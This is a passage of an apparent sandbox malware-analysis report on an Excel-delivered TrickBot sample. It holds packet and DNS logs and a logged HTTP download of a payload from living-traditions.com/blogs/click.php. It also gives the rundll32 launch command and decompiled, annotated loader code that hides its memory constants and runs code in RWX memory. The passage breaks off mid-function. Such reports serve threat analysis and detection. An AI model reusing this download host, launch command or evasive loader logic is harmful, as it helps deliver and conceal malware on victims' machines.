                            Apr 12, 2021 17:06:03.681708097 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681719065 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681756973 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681811094 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681813955 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681821108 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681870937 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681896925 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.681936979 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681997061 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.681998968 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.682013035 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.682053089 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.682054043 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.682111025 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.682166100 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.682173014 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.682183027 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.682220936 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.682248116 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.682281017 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.682290077 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.682342052 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.682349920 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.683470964 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689080954 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689157009 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689205885 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689218044 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689280987 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689281940 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689286947 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689341068 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689372063 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689409971 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689431906 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689491034 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689521074 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689548016 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689608097 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689636946 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689665079 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689728022 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689728975 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689733982 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689790010 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689819098 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689847946 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689905882 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689910889 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689918995 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.689964056 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.689994097 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690021992 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690079927 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690082073 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690088034 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690136909 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690165043 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690201044 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690259933 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690260887 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690265894 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690315962 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690346003 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690373898 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690429926 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690433979 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690439939 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690485954 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690512896 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690542936 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690602064 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690604925 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690610886 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690666914 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690696001 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690726995 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690785885 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690787077 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690792084 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690844059 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690875053 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690901041 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690957069 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.690960884 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.690968990 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691015005 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691045046 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691073895 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691132069 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691137075 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691138983 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691199064 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691207886 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691257000 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691287041 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691315889 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691360950 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691374063 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691374063 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691431999 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691450119 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691497087 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691517115 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691555023 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691576004 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691606998 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691622972 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691684008 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691703081 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691741943 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691751003 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691800117 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691808939 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691881895 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691885948 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.691936970 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.691942930 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692003012 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692027092 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692058086 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692059040 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692121029 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692163944 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692179918 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692194939 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692238092 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692245960 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692287922 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692296028 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692352057 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692357063 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692409992 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692418098 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692466974 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692471981 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692522049 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692548990 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692550898 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692565918 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692580938 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692585945 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692606926 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692632914 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692652941 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692657948 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692660093 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692666054 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692683935 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692692995 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692711115 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692734957 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692734957 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692763090 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692775011 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692783117 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692789078 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692801952 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692815065 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692837954 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692840099 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692850113 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692864895 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692871094 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692892075 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692898035 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692918062 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692923069 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692944050 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692949057 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692971945 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.692995071 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.692996979 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.693022966 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.693032026 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.693038940 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.693048000 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.693062067 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.693073988 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.693098068 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.693109035 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.693120956 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.693133116 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.813178062 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813205957 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813220024 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813231945 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813244104 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813261986 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813277960 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813293934 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813311100 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813328028 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813340902 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813354015 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813366890 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813380003 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813436985 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813448906 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.813517094 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.813582897 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:06:03.817209005 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:08:02.416553974 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
                            Apr 12, 2021 17:08:02.547916889 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:08:02.548103094 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30

                            UDP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Apr 12, 2021 17:06:02.484072924 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                            Apr 12, 2021 17:06:02.546745062 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                            DNS Queries

                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                            Apr 12, 2021 17:06:02.484072924 CEST | 192.168.2.22 | 8.8.8.8 | 0xed69 | Standard query (0) | living-traditions.com | A (IP address) | IN (0x0001)

                            DNS Answers

                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                            Apr 12, 2021 17:06:02.546745062 CEST | 8.8.8.8 | 192.168.2.22 | 0xed69 | No error (0) | living-traditions.com | (none) | 64.207.186.30 | A (IP address) | IN (0x0001)

                            HTTP Request Dependency Graph

                            • living-traditions.com

                            HTTP Packets

                            Session ID: 0  Source IP: 192.168.2.22  Source Port: 49165  Destination IP: 64.207.186.30  Destination Port: 80
                            Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                            Timestamp                             kBytes transferred  Direction  Data
                            Apr 12, 2021 17:06:02.699388027 CEST  0                   OUT        GET /blogs/click.php HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: living-traditions.com
                            Connection: Keep-Alive
                            Apr 12, 2021 17:06:02.888154984 CEST  2                   IN         HTTP/1.1 200 OK
                            Server: nginx
                            Date: Mon, 12 Apr 2021 15:06:02 GMT
                            Content-Type: application/octet-stream
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Powered-By: PHP/7.3.25
                            Content-Disposition: attachment; filename="4HeVw.perclick"
                            X-Powered-By: PleskLin


                            Code Manipulations

                            Statistics

                            CPU Usage

                            Memory Usage

                            High Level Behavior Distribution

                            Behavior

                            System Behavior

                            General

                            Start time: 17:05:35
                            Start date: 12/04/2021
                            Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit): false
                            Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase: 0x13f7e0000
                            File size: 27641504 bytes
                            MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high

                            General

                            Start time: 17:05:40
                            Start date: 12/04/2021
                            Path: C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit): false
                            Commandline: rundll32 ..\fdinmd.fii,StartW
                            Imagebase: 0xff700000
                            File size: 45568 bytes
                            MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high

                            General

                            Start time: 17:05:40
                            Start date: 12/04/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: rundll32 ..\fdinmd.fii,StartW
                            Imagebase: 0x940000
                            File size: 44544 bytes
                            MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation: high

                            General

                            Start time: 17:05:41
                            Start date: 12/04/2021
                            Path: C:\Windows\System32\wermgr.exe
                            Wow64 process (32bit):
                            Commandline: C:\Windows\system32\wermgr.exe
                            Imagebase:
                            File size: 50688 bytes
                            MD5 hash: 41DF7355A5A907E2C1D7804EC028965D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: moderate

                            Disassembly

                            Code Analysis

                              Execution Graph

                              Execution Coverage: 21.8%
                              Dynamic/Decrypted Code Coverage: 100%
                              Signature Coverage: 0%
                              Total number of Nodes: 15
                              Total number of Limit Nodes: 1

                              Graph

                              Nodes (id: address, API called):
                              116: 7b3780 SetTimer
                              117: 7b3797 GetMessageW
                              118: 7b37bd
                              119: 7b37ab
                              120: 7b37bf DispatchMessageW
                              121: 7b380b VirtualAlloc
                              122: 7b382b Sleep
                              123: 7b383c
                              124: 7b3852 CreateThread, SetTimer
                              125: 7b387a GetMessageW
                              126: 7b38a0
                              127: 7b388e
                              128: 7b38a2 DispatchMessageW
                              129: 7c0000
                              130: 7c000e

                              Edges:
                              116->117, 117->118, 117->119, 118->121, 118->123, 119->118, 119->120, 120->117,
                              121->118, 121->122, 122->118, 123->124, 124->125, 124->129, 125->126, 125->127,
                              127->126, 127->128, 128->125, 129->130

                              Callgraph

                              Executed Functions

                              Control-flow Graph

                              C-Code - Quality: 100%
                              E007B3780() {
                                  _Unknown_base(*)()* _v8;   // base of the freshly allocated RWX region; later used as the thread start address
                                  void* _v12;                // lpAddress for VirtualAlloc (always 0)
                                  struct tagMSG _v40;
                                  long _v44;                 // ends up as 0x40 (PAGE_EXECUTE_READWRITE)
                                  struct HWND__* _v48;
                                  long _v52;                 // ends up as 0x1000 (MEM_COMMIT)
                                  void* _v56;                // thread handle
                                  void* _t38;
                                  void* _t43;
                                  int _t45;

                                  // Arm a 0x25b ms timer and pump messages until WM_TIMER (0x113) arrives;
                                  // the decompiler renders the comparison as (message + 1) == 0x114.
                                  SetTimer(0, 0, 0x25b, 0); // executed
                                  while(GetMessageW( &_v40, 0, 0, 0) != 0) {
                                      _v40.message = _v40.message + 1;
                                      if(_v40.message == 0x114) {
                                          break;
                                      }
                                      DispatchMessageW( &_v40);
                                  }
                                  // The allocation flags are not stored as literals: they are counted down
                                  // from 0x5000 to 0x1000 (MEM_COMMIT) and then from 0x1000 to 0x40
                                  // (PAGE_EXECUTE_READWRITE), which hides the constants from static scanners.
                                  _v12 = 0;
                                  _v48 = 0;
                                  _v52 = 0x5000;
                                  while(_v52 > 0x1000) {
                                      _v52 = _v52 - 1;
                                  }
                                  _v44 = _v52;
                                  while(_v44 > 0x40) {
                                      _v44 = _v44 - 1;
                                  }
                                  // Retry until a 0x43000-byte RWX region is obtained, sleeping 500 ms between attempts.
                                  do {
                                      _t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
                                      _v8 = _t38;
                                      if(_v8 == 0) {
                                          Sleep(0x1f4);
                                      }
                                  } while (_v8 == 0);
                                  _v48 =  &(_v48->i); // decompiler rendering of an increment of _v48
                                  // E007B3740 (not shown) receives the new region as its second argument
                                  // before a thread is started at that address.
                                  E007B3740(_v48, _v8);
                                  _t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
                                  _v56 = _t43;
                                  // Second timer wait (0x2000 ms), again leaving the loop on WM_TIMER.
                                  SetTimer(0, 0, 0x2000, 0); // executed
                                  while(1) {
                                      _t45 = GetMessageW( &_v40, 0, 0, 0);
                                      if(_t45 == 0) {
                                          break;
                                      }
                                      _v40.message = _v40.message + 1;
                                      if(_v40.message == 0x114) {
                                          return _t45;
                                      }
